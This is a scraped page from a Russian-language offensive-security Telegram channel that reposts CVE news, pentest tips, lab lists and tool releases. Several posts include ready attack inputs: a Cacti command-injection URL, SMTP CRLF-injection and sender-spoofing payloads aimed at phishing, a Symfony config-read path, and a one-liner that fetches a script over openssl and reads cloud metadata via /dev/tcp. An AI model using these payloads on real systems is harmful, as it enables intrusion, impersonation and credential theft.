Pentester's Backlog
589 subscribers
309 photos
15 videos
44 files
424 links
Агрегатор новостей из мира наступательной безопасности.

EDUCATIONAL PURPOSES ONLY
Download Telegram
💡 Если в ходе багбаунти/пентеста вы встретили веб-приложение на Symfony, проверьте наличие дебаг режима (/app_dev.php) и возможности чтения конфига: /app_dev.php/_profiler/open?file=app/config/parameters.yml

#tips #bugbounty #pentest
Forwarded from Proxy Bar
CVE-2024-29895 cacti
*
Command injection in cmd_realtime.php
*
fofa link
*
usage:
http://localhost/cacti/cmd_realtime.php?1+1&&calc.exe+1+1+1

#net
🥱2🥴1
Forwarded from Ralf Hacker Channel (Ralf Hacker)
CVE-2024-22120: Time Based SQL Injection in Zabbix Server Audit Log

Affected and fixed version/s:
* 6.0.0 - 6.0.27 / 6.0.28rc1
* 6.4.0 - 6.4.12 / 6.4.13rc1
* 7.0.0alpha1 - 7.0.0beta1 / 7.0.0beta2


Allows to dump any values from database. As an example of exploit above allows privilege escalation from user to admin. In some cases, SQL injection leads to RCE.


PoC: https://support.zabbix.com/secure/attachment/236280/236280_zabbix_server_time_based_blind_sqli.py

#exploit #pentest
Forwarded from Proxy Bar
CVE-2024-21683
Confluence Data Center and Server RCE
*
POC - 3 вариата

#Jirka
🎤 Кстати, на этой странице доступны все доклады с киберфестиваля 2024 Positive Hack Days. Если не присутствовали, то обязательно к просмотру!

👀 Смотреть
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from HaHacking
#заметки #offense

➡️Дополнительно разберёмся в кейсах, описанных в статье @slonser_notes, и в извлекаемом из них импакте!

   🧩   ‟Old new email attacks”   [ 🐍 / 💻 / 💻⚡️


📌 ГЛАВНЫЕ ПОИНТЫ

▪️Пробуйте общаться с почтовыми сервисами по SMTP:
Gmail:     smtp.gmail.com
Outlook: smtp-mail.outlook.com
Yandex: smtp.yandex.ru
Mail.Ru: smtp.mail.ru
...

SSL port: 465
TLS port: 587


▪️Пробуйте разные входные точки:
From: EMAIL
From: <EMAIL>
From: "NAME" <EMAIL>
From: <EMAIL> (COMMENT)
From: GROUP: EMAIL, EMAIL
From: GROUP: <EMAIL>
Sender: EMAIL


▪️Оказались уязвимы почтовые продукты Google, Microsoft, Yandex, ...

▪️Оказались уязвимы парсеры адресов электронных почт, библиотеки ЯП:
    ▪️Python   [email]
    ▪️JS   [addressparser, email-addresses]
    ▪️C#   [System.Net.Mail]
    ▪️Go   [net/mail]
    ▪️Rust, Ruby, PHP, ...


🔑 ПЕЙЛОАДЫ НА ПРОБУ

...➡️...
attacker@[testText\r\nRSET\r\nMAIL FROM: <spoofed@example.org>\r\nRCPT TO: <victim@example.org>\r\nDATA\r\nFrom: spoofed@example.org\r\n\r\nText\r\n.\r\nQUIT\r\n]

📧➡️📧
"Spoofed"
<attacker@outlook.com>: spoofed@outlook.com

📧➡️📧, 📧, ...
<spoofed@gmail.com> "spoofed" <attacker@gmail.com>

📧➡️📧, 📧
Attacker
<spoofed@gmail.com>:<attacker@gmail.com>

📧➡️...
": <attacker@gmail.com> "<spoofed@gmail.com>"



☠️  ИМПАКТ & ПОСЛЕДСТВИЯ

▪️Возможность внедрения конструкции CRLF (\r\n) для внедрения SMTP команд➡️Имперсонация, ...
▪️Некорректный парсинг адреса электронной почты отправителя➡️Имперсонация

❗️Имперсонация➡️(в данном случае) Подделка адреса электронной почты отправителя; Обеспечивает кратное повышение легитимности фишинговых писем в глазах атакуемых


💬 Поскольку вендоры считают перечисленные уязвимости фичами, возможность эксплуатации сохраняет актуальность и уже сейчас мы можем наблюдать, как, например, этими "фичами" начинают пользоваться хактивисты для проведения качественных фишинговых рассылок;


➡️Stay safe.

   @HaHacking  🐇
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Offensive Xwitter
😈 [ Aurélien Chalot @Defte_ ]

Wanna blindly check if the ADCS web enroll is installed on a domain ? Bruteforce the /certenroll endpoint without the trailing/ on all webservers. If you hit the ADCS web enroll you will get a location: /certenroll/ header in the response. Now enjoy blind ntlmrelayx ESC8 👀👀👀

Example. This webserver does not expose a ADCS web enroll endpoint but the Windows Admin Center panel. Yet your command will flag it as ADCS. While mine won't ;)

🐥 [ tweet ]
Forwarded from bin
Открываем настройки демона докера
nano /etc/docker/daemon.json


И добавляем рабочее зеркало, например gcr.io
{
"registry-mirrors": ["https://mirror.gcr.io"]
}


И рестарт
service docker restart


У вас также может быть заблокирован gcr, если вы подключаетесь по IPv6.

Еще парочка зеркал:
https://docker.mirrors.ustc.edu.cn
https://registry.docker-cn.com
https://cr.yandex/mirror/ (нельзя добавить в daemon.json; не все образы)

Второй вариант добавления зеркала:
nano /etc/sysconfig/docker

OPTIONS='--selinux-enabled --log-driver=journald --registry-mirror=<MIRROR>'

Еще увидел huecker.io, но на прод бы не поставил, как временное решение — ок.
🥱1
Forwarded from AP Security
#pentest

📣 CVE-2024-5522 (CVSS 10)
Критический дефект безопасности угрожает тысячам сайтов WordPress

📶Пользователям WordPress, которые установили популярный плагин HTML5 Video Player, настоятельно рекомендуется принять немедленные меры после обнаружения критической уязвимости безопасности.

📶Уязвимость, отслеживаемая как CVE-2024-5522, позволяет неаутентифицированным злоумышленникам внедрять вредоносный код SQL в базы данных веб-сайтов, потенциально подвергая риску конфиденциальную информацию или целостность сайта.

⚡️Учитывая более 30 000 активных установок, эта уязвимость представляет значительный риск для большого количества веб-сайтов WordPress.

Если обновление невозможно, временно отключите или удалите плагин, пока не будет доступно исправление.
Please open Telegram to view this post
VIEW IN TELEGRAM
❤‍🔥1👍1🙏1🥱1🍌1
Forwarded from Kali Linux
⚡️ Вышла Kali Linux 2024.2 с 18 новыми инструментами и решением Проблемы 2038 года

Представлена новая версия
Kali Linux 2024.2, в которую вошли сразу 18 новых инструментов, а также исправление для известной проблемы Y2038.

В новой версии пока не доступно ядро Linux 6.8, но оно ожидается в следующей версии (2024.3).

Зато релиз содержит 18 новых куртых инструментов:

* autorecon: многопоточный инструмент для сетевой разведки
* coercer: автоматическое принуждение Windows-сервера к аутентификации на произвольной машине
* dploot: переписанная на Python версия SharpDPAPI
* getsploit: утилита для поиска и загрузки эксплоитов
* gowitness: утилита для создания скриншотов с использованием Chrome Headless
* horst: оптимизированный инструмент для радиосканирования
* ligolo-ng: инструмент для туннелирования через интерфейс TUN
* mitm6: взлом IPv4 через IPv6
* netexec — инструмент для эксплуатации сетевых служб, который помогает автоматизировать оценку безопасности больших сетей;
* pspy — инструмент для мониторинга процессов Linux без root-прав;
* pyinstaller — преобразование (упаковка) Python-программ в самостоятельные исполняемые файлы;
* pyinstxtractor — экстрактор PyInstalller;
* sharpshooter — фреймворк для генерации полезных нагрузок;
* sickle — инструмент для разработки полезных нагрузок;
* snort — гибкая система для обнаружения сетевых вторжений;
* sploitscan — простой поиск информации о CVE;
* vopono — запуск приложений через VPN-туннели с временными сетевыми пространствами имен (namespace);
* waybackpy — API для Wayback Machine с помощью Python.

В данном релизе исправлена проблема Y2038. Она возникает на Linux-системах из-за 32-битного представления времени. Чтобы решить проблему, time_t был изменен на 64-битный на 32-битных архитектурах ARM, которые используются в основном в образах для Raspberry Pi и NetHunter.

В дополнение к новым инструментам и исправлениям, Kali 2024.2 включает:

* Gnome 46 с обновленными темами и расширениями
* Обновленный Xfce для повышения стабильности и производительности

@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
1👍1🥱1
Forwarded from 1N73LL1G3NC3
NetExec #335 Add Recall module for dumping all users Microsoft Recall DBs & screenshots

You can now remotely dump Recall data over the internet from Linux etc.
🎃3🔥2
Forwarded from SHADOW:Group
🔎Собираем поддомены и IP в RSECloud

Недавно нашел новый ресурс, под названием RSECloud, который позволяет собирать поддомены и IP'шники организации по домену или имени организации. Работает как в вебе, так и через API.

Чтобы удобно прикрутить его к своей автоматизации накидал небольшой скрипт на GO, который предполагает 3 варианта использования:

Сбор поддоменов:
rsescan -d example.com -key YOUR_API_KEY


Сбор IP'шников по домену:
rsescan -d example.com -cn -key YOUR_API_KEY


Сбор IP'шников по имени организации:
rsescan -so "Organization Name" -key YOUR_API_KEY


Для получения API ключа нужно просто пройти регистрацию по почте. Для всех желающих залил скрипт на гитхаб.

Ссылка на RSECloud
Ссылка на скрипт

#web #recon
Please open Telegram to view this post
VIEW IN TELEGRAM
🥱1
Forwarded from PurpleBear (Vadim Shelest)
Меня иногда просят посоветовать self-hosted лабы по различным доменам знаний деятельности пентестеров для наработки и совершенствования навыков на практике, поэтому ловите небольшую подборку:

☑️ Kubernetes Goat - Vulnerable by design Kubernetes cluster
☑️ DVWA - Damn Vulnerable Web Application
☑️ DVWS - Damn Vulnerable Web Sockets
☑️ DVHMA - Damn Vulnerable Hybrid Mobile App (Android)
☑️ DVIA - Damn Vulnerable iOS App
☑️ DVIA2 - Damn Vulnerable iOS App v2
☑️ CI/CD Goat - Vulnerable CI/CD environment
☑️ DVGA - Damn Vulnerable GraphQL Application
☑️ VAmPI - Vulnerable REST API
☑️ DVSA - Damn Vulnerable Serverless Application
☑️ DVFaaS - Damn Vulnerable Functions as a Service (AWS Lambda)
☑️ AWS Goat - Damn Vulnerable AWS Infrastructure
☑️ DVCA - Damn Vulnerable Cloud Application (AWS privesc)
☑️ Azure Goat - Damn Vulnerable Azure Infrastructure
☑️ GCP Goat - Damn Vulnerable GCP Infrastructure
☑️ DVTA - Damn Vulnerable Thick Client App
☑️ DVJA - Damn Vulnerable Java (EE) Application
☑️ DVID - Damn Vulnerable IoT Device
☑️ DVAS - Damn Vulnerable Application Scanner
☑️ DVB - Damn Vulnerable Bank
☑️ DVWPS - Damn Vulnerable WordPress Site
☑️ DVNA - Damn Vulnerable NodeJS Application
☑️ DVGM - Damn Vulnerable Grade Management
☑️ Tiredful API - REST API intentionally designed broken App
☑️ DVCSharp - Damn Vulnerable C# Application (API)
☑️ DVRF - Damn Vulnerable Router Firmware
☑️ DVLLMP - Damn Vulnerable LLM Project
☑️ DVLLMA - Damn Vulnerable LLM Agent

Безусловно некоторые из них уже устарели и содержат не самые актуальные баги, а с некоторыми придется повозиться чтобы установить и развернуть, но все же это хорошая отправная точка для погружения в интересующую тематику😎
🥱1
Forwarded from Netlas.io
CVE-2024-34102 and others: Multiple vulns in Magento Open Source, 4.8 - 9.8 rating 🔥🔥🔥

New vulnerabilities in Magento (and Adobe Commerce) for every taste: arbitrary code execution, security feature bypass and privilege escalation!

Search at Netlas.io:
👉 Link: https://nt.ls/rxUR7
👉 Dork: tag.name:"magento"

Vendor's advisory: https://helpx.adobe.com/security/products/magento/apsb24-40.html
😈2🥱1
4🥱2💯1🤝1
Forwarded from Очерк
Недавно возникла ситуация, оказался в контейнере, где не было никаких curl, wget и прав что бы что-то поставить самостоятельно.
Добрые люди подсказали юзать openssl:

(echo -ne "GET /stealthcopter/deepce/main/deepce.sh HTTP/1.1\r\nHost: raw.githubusercontent.com\r\nConnection: close\r\n\r\n"; sleep 3) | openssl s_client -connect raw.githubusercontent.com:443 -quiet > deepce.sh

Так же можно выполнить SSRF если это облако:

exec 3<>/dev/tcp/169.254.169.254/80 && echo -e "GET /metadata/v1.json HTTP/1.1\r\nHost: 169.254.169.254\r\nConnection: close\r\n\r\n" >&3 && cat <&3 > v1.json

Оставлю это здесь если кто-то столкнется с таким🕴
🥱2🤯1
Forwarded from APT
🔥 VMware vCenter Server RCE + PrivEsc

Multiple heap-overflow vulnerabilities in the implementation of the DCE/RPC protocol. They could allow a bad actor with network access to vCenter Server to achieve remote code execution by sending a specially crafted network packet.

CVE-2024-37079: A heap-overflow vulnerability in the DCERPC protocol implementation of vCenter Server that allows a malicious actor with network access to send specially crafted packets, potentially leading to remote code execution. (CVSS v3.1 score: 9.8 "critical");

CVE-2024-37080: Another heap overflow vulnerability in the DCERPC protocol of vCenter Server. Similar to CVE-2024-37079, it allows an attacker with network access to exploit heap overflow by sending crafted packets, potentially resulting in remote code execution. (CVSS v3.1 score: 9.8 "critical");

CVE-2024-37081: This vulnerability arises from a misconfiguration of sudo in vCenter Server, permitting an authenticated local user to exploit this flaw to elevate their privileges to root on the vCenter Server Appliance. (CVSS v3.1 score: 7.8 "high").

Nuclei Template (PoC):
🔗 https://gist.github.com/tothi/0ff034b254aca527c3a1283ff854592a

Shodan
product:"VMware vCenter Server"

FOFA
app="vmware-vCenter"


#vmware #vcenter #rce #lpe #cve
🥱3